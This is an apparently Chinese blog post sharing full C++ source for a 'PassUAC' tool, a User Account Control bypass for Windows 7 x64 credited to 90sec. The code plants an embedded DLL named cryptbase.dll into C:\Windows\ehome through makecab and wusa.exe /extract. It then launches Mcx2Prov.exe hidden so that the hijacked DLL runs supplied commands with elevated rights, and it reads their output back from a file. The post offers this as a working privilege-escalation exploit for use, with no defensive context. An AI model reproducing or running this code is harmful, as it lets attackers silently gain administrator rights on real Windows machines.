• WIN7 X64 PASSUAC 源码


    // Passuac.cpp : Defines the entry point for the console application.
    //
    
    #include "stdafx.h"
    #include <Windows.h>
    #include <stdio.h>
    #include  <direct.h>
    
    BOOL IsUserInAdminGroup() //判断是否在管理员组
    {
        BOOL fInAdminGroup = FALSE;
        HANDLE hToken = NULL;
        HANDLE hTokenToCheck = NULL;
        DWORD cbSize = 0;
    
        OSVERSIONINFO osver = {0};
        osver.dwOSVersionInfoSize = sizeof(osver);
    
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))
            goto Cleanup;
        if (!GetVersionEx(&osver))
            goto Cleanup;
        if (osver.dwMajorVersion >= 6)
        {
            TOKEN_ELEVATION_TYPE elevType;
            if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))
                goto Cleanup;
            if (TokenElevationTypeLimited == elevType)
            {
                if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))
                    goto Cleanup;
            }
        }
    
        if (!hTokenToCheck)
        {
            if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))
                goto Cleanup;
        }
    
        BYTE adminSID[SECURITY_MAX_SID_SIZE];
        cbSize = sizeof(adminSID);
        if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))
            goto Cleanup;
        if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup)) 
            goto Cleanup;
    
    Cleanup:
        if (hToken)    CloseHandle(hToken);
        if (hTokenToCheck) CloseHandle(hTokenToCheck);
        return fInAdminGroup;
    }
    
    BOOL IsRunAsAdmin() //判断是否以管理员权限运行
    {
        BOOL fIsRunAsAdmin = FALSE;
        DWORD dwError = ERROR_SUCCESS;
        PSID pAdministratorsGroup = NULL;
    
        SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
        if (!AllocateAndInitializeSid(
            &NtAuthority, 
            2, 
            SECURITY_BUILTIN_DOMAIN_RID, 
            DOMAIN_ALIAS_RID_ADMINS, 
            0, 0, 0, 0, 0, 0, 
            &pAdministratorsGroup))
        {
            dwError = GetLastError();
            goto Cleanup;
        }
    
        if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))
        {
            dwError = GetLastError();
            goto Cleanup;
        }
    
    Cleanup:
        if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);
        return fIsRunAsAdmin;
    }
    
    BOOL writedll64()
    {
    
        char Szpath[MAX_PATH] = {0};
        char uacexqute[1024] = {0};
        DWORD   dwWrite=0;
        WORD wResID;
        HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
        if (hFile == INVALID_HANDLE_VALUE)
        {
            printf("Getlasterror:%d.
    ",GetLastError());
            return 0;
        }
        HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");
        HGLOBAL hG = LoadResource(NULL, hrsc);
        DWORD   dwSize = SizeofResource( NULL,  hrsc); 
    
        WriteFile(hFile,hG,dwSize,&dwWrite,NULL); 
        CloseHandle( hFile );
    
        getcwd(Szpath, MAX_PATH);
        strcat(Szpath,"\cryptbase.tmp");
        system("makecab cryptbase.dll cryptbase.tmp");
        sprintf(uacexqute,"%s /extract:C:\Windows\ehome\",Szpath);
    
        ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);
    
        //remove("cryptbase*");
        DeleteFileA("cryptbase.dll");
        DeleteFileA("cryptbase.tmp");
    
        return true;
    }
    
    int main(int argc,char* argv[])
    {
        FILE* fp;
        char szcmd[1024] = {0};
        char *Options;
        char buffer[2048] = {0};
        STARTUPINFO si={sizeof(si)};
        PROCESS_INFORMATION pi;
        si.dwFlags=STARTF_USESHOWWINDOW;
        si.wShowWindow=TRUE;
    
    
        if (argc < 2)
        {
            printf("[*]:%s Passuac for windows 7 x64
    ",argv[0]);
            printf("[*]:%s Setp1: passuac
    ",argv[0]);
            printf("[*]:%s Setp2: shell_cmd
    ",argv[0]);
            printf("[*]:Welcome to www.90sec.org
    ");
            printf("[*]:Pass uac t00ls By:@90sec
    
    ");
            return 0;
        }
    
        strcpy(szcmd,argv[1]);
    
        char szNewCmd[MAX_PATH] = {0};
        wsprintfA(szNewCmd, ""%s"", szcmd);
    
    
        if (!IsUserInAdminGroup())
        {
            printf("Your not have in Local Administrator Group
    ");
            printf("Program exit;");
            exit(1);
        }else
        {
            printf("Your have in Local Administrator Group
    ");
            printf("PassUac ing.....
    ");
            if (!IsRunAsAdmin())
            {
                if (!strcmp(szcmd,"passuac"))
                {
                    writedll64();
                }else
                {
                    
                    ShellExecuteA(NULL, "open", "C:\windows\ehome\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);
                    Sleep(4000);
    
                    fp = fopen("c:\programdata\uac.txt","rb");
                    if (fp == NULL)
                    {
                        printf("Getlasterror:%d
    ",GetLastError());
                        return 0;
                    }
    
                    ZeroMemory(buffer,sizeof(buffer));
    
                    while (fgets(buffer,sizeof(buffer),fp))
                    {
                        printf(buffer);
                    }
                    fclose(fp);
                }
            }
        }
        return 0;
    }

    需要自己写个DLL,来进行参数解析。请看代码把。

    代码写的相当烂,但是能够达到地步,还请各位莫笑话。

  • 相关阅读:
    无法访问局域网其他计算机
    部署好网站,同局域网中电脑无法访问的问题的解决方案
    python——模块
    python字符串实战
    python——迭代器和生成器
    python——面向对象基础
    python——文件操作
    python——面向对象相关
    python——面向对象进阶
    设计模式——单例模式
  • 原文地址:https://www.cnblogs.com/killbit/p/4787657.html
Copyright © 2020-2023  润新知